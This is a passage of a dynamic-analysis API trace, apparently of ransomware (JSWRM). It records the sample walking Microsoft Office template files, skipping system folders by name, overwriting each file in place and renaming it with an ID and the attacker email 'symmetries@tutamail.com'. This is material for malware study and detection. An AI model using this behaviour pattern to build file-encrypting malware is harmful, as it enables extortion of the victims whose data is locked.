lpString2=".") returned 1 [0121.044] lstrcmpiW (lpString1="minimalist.dotx", lpString2="..") returned 1 [0121.044] lstrcmpiW (lpString1="minimalist.dotx", lpString2="...") returned 1 [0121.044] lstrcmpiW (lpString1="minimalist.dotx", lpString2="windows") returned -1 [0121.045] lstrcmpiW (lpString1="minimalist.dotx", lpString2="recovery") returned -1 [0121.045] lstrcmpiW (lpString1="minimalist.dotx", lpString2="perflogs") returned -1 [0121.045] lstrcmpiW (lpString1="minimalist.dotx", lpString2="documents and settings") returned 1 [0121.045] lstrcmpiW (lpString1="minimalist.dotx", lpString2="$RECYCLE.BIN") returned 1 [0121.045] lstrcmpiW (lpString1="minimalist.dotx", lpString2="system volume information") returned -1 [0121.045] lstrcmpiW (lpString1="minimalist.dotx", lpString2="msocache") returned -1 [0121.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0121.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="minimalist.dotx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="minimalist.dotx", cchWideChar=15, lpMultiByteStr=0x345e870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="minimalist.dotx", lpUsedDefaultChar=0x0) returned 15 [0121.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0121.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="minimalist.dotx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="minimalist.dotx", cchWideChar=15, lpMultiByteStr=0x345e840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="minimalist.dotx", lpUsedDefaultChar=0x0) returned 15 [0121.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0121.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0121.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0121.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\minimalist.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\minimalist.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0121.046] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12236) returned 1 [0121.046] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2fc0) returned 0x24e1d8 [0121.046] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2fc0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2fc0, lpOverlapped=0x0) returned 1 [0121.049] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.049] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2fc0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2fc0, lpOverlapped=0x0) returned 1 [0121.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.049] CloseHandle (hObject=0x314) returned 1 [0121.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0121.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0121.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0121.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0121.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0121.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0121.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.049] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\minimalist.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\minimalist.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\minimalist.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\minimalist.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0121.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0121.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0121.050] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f32, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="shaded.dotx", cAlternateFileName="SHADED~1.DOT")) returned 1 [0121.050] lstrcmpiW (lpString1="shaded.dotx", lpString2=".") returned 1 [0121.050] lstrcmpiW (lpString1="shaded.dotx", lpString2="..") returned 1 [0121.050] lstrcmpiW (lpString1="shaded.dotx", lpString2="...") returned 1 [0121.050] lstrcmpiW (lpString1="shaded.dotx", lpString2="windows") returned -1 [0121.050] lstrcmpiW (lpString1="shaded.dotx", lpString2="recovery") returned 1 [0121.050] lstrcmpiW (lpString1="shaded.dotx", lpString2="perflogs") returned 1 [0121.050] lstrcmpiW (lpString1="shaded.dotx", lpString2="documents and settings") returned 1 [0121.050] lstrcmpiW (lpString1="shaded.dotx", lpString2="$RECYCLE.BIN") returned 1 [0121.050] lstrcmpiW (lpString1="shaded.dotx", lpString2="system volume information") returned -1 [0121.050] lstrcmpiW (lpString1="shaded.dotx", lpString2="msocache") returned 1 [0121.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0121.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shaded.dotx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shaded.dotx", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shaded.dotx", lpUsedDefaultChar=0x0) returned 11 [0121.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0121.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shaded.dotx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shaded.dotx", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shaded.dotx", lpUsedDefaultChar=0x0) returned 11 [0121.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0121.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0121.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0121.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\shaded.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\shaded.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0121.052] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12082) returned 1 [0121.052] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f30) returned 0x24e1d8 [0121.052] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2f30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2f30, lpOverlapped=0x0) returned 1 [0121.054] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.054] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2f30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2f30, lpOverlapped=0x0) returned 1 [0121.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.054] CloseHandle (hObject=0x314) returned 1 [0121.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0121.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0121.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0121.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0121.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0121.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0121.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.055] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\shaded.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\shaded.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\shaded.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\shaded.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0121.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0121.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0121.056] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f42, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="word2013.dotx", cAlternateFileName="WORD20~1.DOT")) returned 1 [0121.056] lstrcmpiW (lpString1="word2013.dotx", lpString2=".") returned 1 [0121.056] lstrcmpiW (lpString1="word2013.dotx", lpString2="..") returned 1 [0121.056] lstrcmpiW (lpString1="word2013.dotx", lpString2="...") returned 1 [0121.056] lstrcmpiW (lpString1="word2013.dotx", lpString2="windows") returned 1 [0121.056] lstrcmpiW (lpString1="word2013.dotx", lpString2="recovery") returned 1 [0121.056] lstrcmpiW (lpString1="word2013.dotx", lpString2="perflogs") returned 1 [0121.056] lstrcmpiW (lpString1="word2013.dotx", lpString2="documents and settings") returned 1 [0121.056] lstrcmpiW (lpString1="word2013.dotx", lpString2="$RECYCLE.BIN") returned 1 [0121.056] lstrcmpiW (lpString1="word2013.dotx", lpString2="system volume information") returned 1 [0121.056] lstrcmpiW (lpString1="word2013.dotx", lpString2="msocache") returned 1 [0121.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="word2013.dotx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0121.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="word2013.dotx", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="word2013.dotx", lpUsedDefaultChar=0x0) returned 13 [0121.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0121.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="word2013.dotx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0121.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="word2013.dotx", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="word2013.dotx", lpUsedDefaultChar=0x0) returned 13 [0121.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0121.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0121.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0121.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0121.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\word2013.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\word2013.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0121.057] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12098) returned 1 [0121.057] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f40) returned 0x24e1d8 [0121.057] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2f40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2f40, lpOverlapped=0x0) returned 1 [0121.059] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.060] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2f40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2f40, lpOverlapped=0x0) returned 1 [0121.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.060] CloseHandle (hObject=0x314) returned 1 [0121.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0121.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0121.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0121.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0121.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0121.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0121.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.060] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\word2013.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\word2013.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\word2013.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\word2013.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0121.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0121.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0121.061] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f11, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="word2013bw.dotx", cAlternateFileName="WORD20~2.DOT")) returned 1 [0121.061] lstrcmpiW (lpString1="word2013bw.dotx", lpString2=".") returned 1 [0121.061] lstrcmpiW (lpString1="word2013bw.dotx", lpString2="..") returned 1 [0121.061] lstrcmpiW (lpString1="word2013bw.dotx", lpString2="...") returned 1 [0121.061] lstrcmpiW (lpString1="word2013bw.dotx", lpString2="windows") returned 1 [0121.061] lstrcmpiW (lpString1="word2013bw.dotx", lpString2="recovery") returned 1 [0121.061] lstrcmpiW (lpString1="word2013bw.dotx", lpString2="perflogs") returned 1 [0121.061] lstrcmpiW (lpString1="word2013bw.dotx", lpString2="documents and settings") returned 1 [0121.061] lstrcmpiW (lpString1="word2013bw.dotx", lpString2="$RECYCLE.BIN") returned 1 [0121.061] lstrcmpiW (lpString1="word2013bw.dotx", lpString2="system volume information") returned 1 [0121.061] lstrcmpiW (lpString1="word2013bw.dotx", lpString2="msocache") returned 1 [0121.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0121.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="word2013bw.dotx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="word2013bw.dotx", cchWideChar=15, lpMultiByteStr=0x345e870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="word2013bw.dotx", lpUsedDefaultChar=0x0) returned 15 [0121.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0121.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0121.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="word2013bw.dotx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="word2013bw.dotx", cchWideChar=15, lpMultiByteStr=0x345e840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 